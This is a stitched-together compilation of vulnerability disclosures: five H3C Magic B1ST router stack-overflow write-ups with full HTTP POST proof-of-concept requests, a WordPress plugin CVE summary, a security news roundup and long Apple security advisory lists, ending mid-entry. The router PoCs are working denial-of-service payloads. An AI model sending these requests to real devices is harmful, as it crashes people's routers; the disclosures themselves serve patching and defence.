A stack overflow in the UpdateWanMode function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is UpdateWanMode, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v6 on the stack. The parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=UpdateWanMode&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**Result**

the process webs restart

CVE-2023-34932: vuln/H3C_B1STW/CVE-2023-34932.md at main · h4kuy4/vuln

A stack overflow in the EditWlanMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is EditWlanMacList, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v27 on the stack. In this function, the length of param is limited to 511 Bytes，but v27 only have 64 Byte. Also, the parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 173
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp?refresh=yes?refreshFlag=Tue%20Jun%2006%202023%2016:39:29%20GMT+0800%20(China%20Standard%20Time)
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=EditWlanMacList&GO=wan\_new.asp&param=1;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;

**Result**

the process webs restart

CVE-2023-34931: vuln/H3C_B1STW/CVE-2023-34931.md at main · h4kuy4/vuln

A stack overflow in the AddMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is AddMacList, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v12 on the stack. The parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=AddMacList&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;;;;

**Result**

the process webs restart

CVE-2023-34929: vuln/H3C_B1STW/CVE-2023-34929.md at main · h4kuy4/vuln

A stack overflow in the Edit_BasicSSID function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is Edit_BasicSSID, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v33 on the stack. The parameter %[^;] of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=Edit\_BasicSSID&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;

**Result**

the process webs restart

CVE-2023-34928: vuln/H3C_B1STW/CVE-2023-34928.md at main · h4kuy4/vuln

A stack overflow in the EditMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is EditMacList, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v12, v14, v15, v13 on the stack. The parameter %[^;] of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=EditMacList&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;;;;

**Result**

the process webs restart

CVE-2023-34930: vuln/H3C_B1STW/CVE-2023-34930.md at main · h4kuy4/vuln

The User Registration plugin for WordPress is vulnerable to Sensitive Information Exposure due to hardcoded encryption key on the 'lock_content_form_handler' and 'display_password_form' function in versions up to, and including, 3.7.3. This makes it possible for unauthenticated attackers to decrypt and view the password protected content.

CVE-2023-3371: Helper.php in embedpress/tags/3.7.3/EmbedPress/Includes/Classes – WordPress Plugin Repository

Plus: Discord has a child predator problem, fears rise of China spying from Cuba, and hackers try to blackmail Reddit.

Apple says the patches fix a memory corruption that allowed an app to execute arbitrary code and a WebKit vulnerability that enabled malicious code execution through web content. The attacks have been seen only on devices running versions of iOS released before iOS 15.7, according to the company. Even if you’re an unlikely target for spyware, now’s a good time to update your iPhone.

This week, an alarming investigation by NBC News found that Discord, a social media popular with gamers, has become a popular venue for child sexual exploitation. NBC News identified 35 cases over the past six years in which adults have faced charges of kidnapping, grooming, or sexual assault that were allegedly facilitated by Discord. Nearly half of these cases resulted in guilty pleas or verdicts, while many others are still under investigation.

NBC News’ review of cases is likely a vast undercount, the report says, as these numbers represent only reported cases where charges were brought. Victims generally face significant challenges when it comes to reporting, investigations, and prosecution. Stephen Sauer, the director of the tip line at the Canadian Centre for Child Protection, told NBC News, “What we see is only the tip of the iceberg.”

According to experts interviewed by NBC News, while online child exploitation is not exclusive to Discord, the platform's decentralized moderation system and its young user base have likely made it an appealing environment for those seeking to exploit children.

The investigation comes as a _Washington Post_ report found that thousands of AI-generated child sexual abuse images have been found on forums across the dark web.

According to _The Wall Street Journal_, US officials have been monitoring the activities of employees working for Chinese telecom companies Huawei Technologies and ZTE at suspected spy facilities in Cuba. The news comes amid a push to restrict the use of Huawei and ZTE mobile infrastructure across the West.

Earlier this month, the _Journal_ reported that China has been operating a spy base in Cuba since at least 2019 and that the two countries jointly maintain four additional eavesdropping stations on the island. Officials from the Biden administration caution that these facilities could potentially intercept electronic signals from US military bases.

According to representative Mike Gallagher, the chairman of the US House Select Committee on the Chinese Communist Party, Huawei and ZTE have had regular business presence in Cuba while working to modernize the island’s internet infrastructure. In a letter Gallagher sent to director of national intelligence Avril Haines, which the _Journal_ viewed, Gallagher wrote that any enhancement of China’s intelligence capabilities in Cuba “is likely” to be aided by Chinese telecommunications companies.

In a statement, Huawei described the report as "groundless accusations" and emphasized its commitment to full compliance with applicable laws and regulations in the regions they operate. Similarly, ZTE dismissed the _Journal_'s reporting as "baseless."

The recent Reddit protest over changes to its business that threaten third-party apps was messy enough without hackers getting involved. The ransomware gang BlackCat is threatening to release some 80 GB of data that the company says was stolen earlier this year through a “highly targeted” phishing attack.

Reddit says it doesn’t believe the hackers stole user data like passwords, but BlackCat says the files contain “confidential” information. The group is demanding Reddit pay $4.5 million and cancel its plans to charge app developers exorbitant fees for access to its application programming interface, or API. Otherwise the group says, it will release the data ahead of the company’s planned IPO.

Update Your iPhone Right Now to Fix 2 Apple Zero Days

A permissions issue was addressed by removing vulnerable code and adding additional checks. This issue is fixed in macOS Ventura 13.4. An app may be able to bypass Privacy preferences

Released May 18, 2023

**Accessibility**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32388: Kirin (@Pwnrin)

**Accessibility**

Available for: macOS Ventura

Impact: Entitlements and privacy permissions granted to this app may be used by a malicious app

Description: This issue was addressed with improved checks.

CVE-2023-32400: Mickey Jin (@patch1t)

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32411: Mickey Jin (@patch1t)

**Associated Domains**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved checks.

CVE-2023-32371: James Duffy (mangoSecure)

**Contacts**

Available for: macOS Ventura

Impact: An app may be able to observe unprotected user data

Description: A privacy issue was addressed with improved handling of temporary files.

CVE-2023-32386: Kirin (@Pwnrin)

**Core Location**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32399: an anonymous researcher

**CoreServices**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-28191: Mickey Jin (@patch1t)

**CUPS**

Available for: macOS Ventura

Impact: An unauthenticated user may be able to access recently printed documents

Description: An authentication issue was addressed with improved state management.

CVE-2023-32360: Gerhard Muth

**dcerpc**

Available for: macOS Ventura

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32387: Dimitrios Tatsis of Cisco Talos

**DesktopServices**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved checks.

CVE-2023-32414: Mickey Jin (@patch1t)

**GeoServices**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32392: an anonymous researcher

**ImageIO**

Available for: macOS Ventura

Impact: Processing an image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32372: Meysam Firouzi of @R00tkitSMM Mbition mercedes-benz innovation lab working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: macOS Ventura

Impact: Processing an image may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2023-32384: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero Day Initiative

**IOSurface**

Available for: macOS Ventura

Impact: An app may be able to leak sensitive kernel state

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32410: hou xuewei (@p1ay8y3ar) vmk msu

**IOSurfaceAccelerator**

Available for: macOS Ventura

Impact: An app may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32420: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved checks.

CVE-2023-27930: 08Tc3wBB of Jamf

**Kernel**

Available for: macOS Ventura

Impact: A sandboxed app may be able to observe system-wide network connections

Description: The issue was addressed with additional permissions checks.

CVE-2023-27940: James Duffy (mangoSecure)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32398: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to gain root privileges

Description: A race condition was addressed with improved state handling.

CVE-2023-32413: Eloi Benoist-Vanderbeken (@elvanderb) from Synacktiv (@Synacktiv) working with Trend Micro Zero Day Initiative

**LaunchServices**

Available for: macOS Ventura

Impact: An app may bypass Gatekeeper checks

Description: A logic issue was addressed with improved checks.

CVE-2023-32352: Wojciech Reguła (@\_r3ggi) of SecuRing (wojciechregula.blog)

**libxpc**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved state management.

CVE-2023-32369: Jonathan Bar Or of Microsoft, Anurag Bohra of Microsoft, and Michael Pearse of Microsoft

**libxpc**

Available for: macOS Ventura

Impact: An app may be able to gain root privileges

Description: A logic issue was addressed with improved checks.

CVE-2023-32405: Thijs Alkemade (@xnyhps) from Computest Sector 7

**Metal**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved state management.

CVE-2023-32407: Gergely Kalman (@gergely\_kalman)

**Model I/O**

Available for: macOS Ventura

Impact: Processing a 3D model may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32368: Mickey Jin (@patch1t)

CVE-2023-32375: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

CVE-2023-32382: Mickey Jin (@patch1t)

**Model I/O**

Available for: macOS Ventura

Impact: Processing a 3D model may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2023-32380: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32403: an anonymous researcher

**PackageKit**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved state management.

CVE-2023-32355: Mickey Jin (@patch1t)

**PDFKit**

Available for: macOS Ventura

Impact: Opening a PDF file may lead to unexpected app termination

Description: A denial-of-service issue was addressed with improved memory handling.

CVE-2023-32385: Jonathan Fritz

**Perl**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved state management.

CVE-2023-32395: Arsenii Kostromin (0x3c3e)

**Photos**

Available for: macOS Ventura

Impact: Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup

Description: The issue was addressed with improved checks.

CVE-2023-32390: Julian Szulc

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to retain access to system configuration files even after its permission is revoked

Description: An authorization issue was addressed with improved state management.

CVE-2023-32357: Yiğit Can YILMAZ (@yilmazcanyigit), Koh M. Nakagawa of FFRI Security, Inc., Kirin (@Pwnrin), Jeff Johnson (underpassapp.com), and Csaba Fitzl (@theevilbit) of Offensive Security

**Screen Saver**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A permissions issue was addressed by removing vulnerable code and adding additional checks.

CVE-2023-32363: Mickey Jin (@patch1t)

**Security**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed with improved entitlements.

CVE-2023-32367: James Duffy (mangoSecure)

**Shell**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved state management.

CVE-2023-32397: Arsenii Kostromin (0x3c3e)

**Shortcuts**

Available for: macOS Ventura

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with improved checks.

CVE-2023-32391: Wenchao Li and Xiaolong Bai of Alibaba Group

**Shortcuts**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32404: Mickey Jin (@patch1t), Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com), and an anonymous researcher

**Siri**

Available for: macOS Ventura

Impact: A person with physical access to a device may be able to view contact information from the lock screen

Description: The issue was addressed with improved checks.

CVE-2023-32394: Khiem Tran

**SQLite**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by adding additional SQLite logging restrictions.

CVE-2023-32422: Gergely Kalman (@gergely\_kalman), and Wojciech Reguła of SecuRing (wojciechregula.blog)

Entry updated June 2, 2023

**StorageKit**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved entitlements.

CVE-2023-32376: Yiğit Can YILMAZ (@yilmazcanyigit)

**System Settings**

Available for: macOS Ventura

Impact: An app firewall setting may not take effect after exiting the Settings app

Description: This issue was addressed with improved state management.

CVE-2023-28202: Satish Panduranga and an anonymous researcher

**Telephony**

Available for: macOS Ventura

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32412: Ivan Fratric of Google Project Zero

**TV App**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32408: Adam M.

**Weather**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32415: Wojciech Regula of SecuRing (wojciechregula.blog), and an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing web content may disclose sensitive information

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 255075  
CVE-2023-32402: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing web content may disclose sensitive information

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 254781  
CVE-2023-32423: Ignacio Sanmillan (@ulexec)

**WebKit**

Available for: macOS Ventura

Impact: A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited.

Description: The issue was addressed with improved bounds checks.

WebKit Bugzilla: 255350  
CVE-2023-32409: Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International’s Security Lab

**WebKit**

Available for: macOS Ventura

Impact: Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 254930  
CVE-2023-28204: an anonymous researcher

_This issue was first addressed in Rapid Security Response macOS 13.3.1 (a)._

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 254840  
CVE-2023-32373: an anonymous researcher

_This issue was first addressed in Rapid Security Response macOS 13.3.1 (a)._

**Wi-Fi**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32389: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

CVE-2023-32363: About the security content of macOS Ventura 13.4

A type confusion issue was addressed with improved checks. This issue is fixed in iOS 16.5.1 and iPadOS 16.5.1, Safari 16.5.1, macOS Ventura 13.4.1, iOS 15.7.7 and iPadOS 15.7.7. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

This document describes the security content of Safari 16.5.1.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**Safari 16.5.1**

Released June 21, 2023

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A type confusion issue was addressed with improved checks.

WebKit Bugzilla: 256567  
CVE-2023-32439: an anonymous researcher

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: June 21, 2023

CVE-2023-32439: About the security content of Safari 16.5.1

A type confusion issue was addressed with improved checks. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4, watchOS 9.5, tvOS 16.5. An app may be able to execute arbitrary code with kernel privileges

Released May 18, 2023

**AppleMobileFileIntegrity**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32411: Mickey Jin (@patch1t)

**Core Location**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32399: an anonymous researcher

**CoreServices**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-28191: Mickey Jin (@patch1t)

**GeoServices**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32392: an anonymous researcher

**ImageIO**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing an image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32372: Meysam Firouzi of @R00tkitSMM Mbition mercedes-benz innovation lab working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing an image may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2023-32384: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero Day Initiative

**IOSurfaceAccelerator**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32354: Linus Henze of Pinauten GmbH (pinauten.de)

**IOSurfaceAccelerator**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32420: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved checks.

CVE-2023-27930: 08Tc3wBB of Jamf

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32398: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to gain root privileges

Description: A race condition was addressed with improved state handling.

CVE-2023-32413: Eloi Benoist-Vanderbeken (@elvanderb) from Synacktiv (@Synacktiv) working with Trend Micro Zero Day Initiative

**Metal**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved state management.

CVE-2023-32407: Gergely Kalman (@gergely\_kalman)

**Model I/O**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a 3D model may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32368: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32403: an anonymous researcher

**Sandbox**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to retain access to system configuration files even after its permission is revoked

Description: An authorization issue was addressed with improved state management.

CVE-2023-32357: Yiğit Can YILMAZ (@yilmazcanyigit), Koh M. Nakagawa of FFRI Security, Inc., Kirin (@Pwnrin), Jeff Johnson (underpassapp.com), and Csaba Fitzl (@theevilbit) of Offensive Security

**Siri**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A person with physical access to a device may be able to view contact information from the lock screen

Description: The issue was addressed with improved checks.

CVE-2023-32394: Khiem Tran

**SQLite**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by adding additional SQLite logging restrictions.

CVE-2023-32422: Gergely Kalman (@gergely\_kalman), and Wojciech Reguła of SecuRing (wojciechregula.blog)

Entry updated June 2, 2023

**StorageKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved entitlements.

CVE-2023-32376: Yiğit Can YILMAZ (@yilmazcanyigit)

**System Settings**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app firewall setting may not take effect after exiting the Settings app

Description: This issue was addressed with improved state management.

CVE-2023-28202: Satish Panduranga and an anonymous researcher

**Telephony**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32412: Ivan Fratric of Google Project Zero

**TV App**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32408: Adam M.

**Weather**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32415: Wojciech Regula of SecuRing (wojciechregula.blog), and an anonymous researcher

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing web content may disclose sensitive information

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 255075  
CVE-2023-32402: an anonymous researcher

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing web content may disclose sensitive information

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 254781  
CVE-2023-32423: Ignacio Sanmillan (@ulexec)

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD
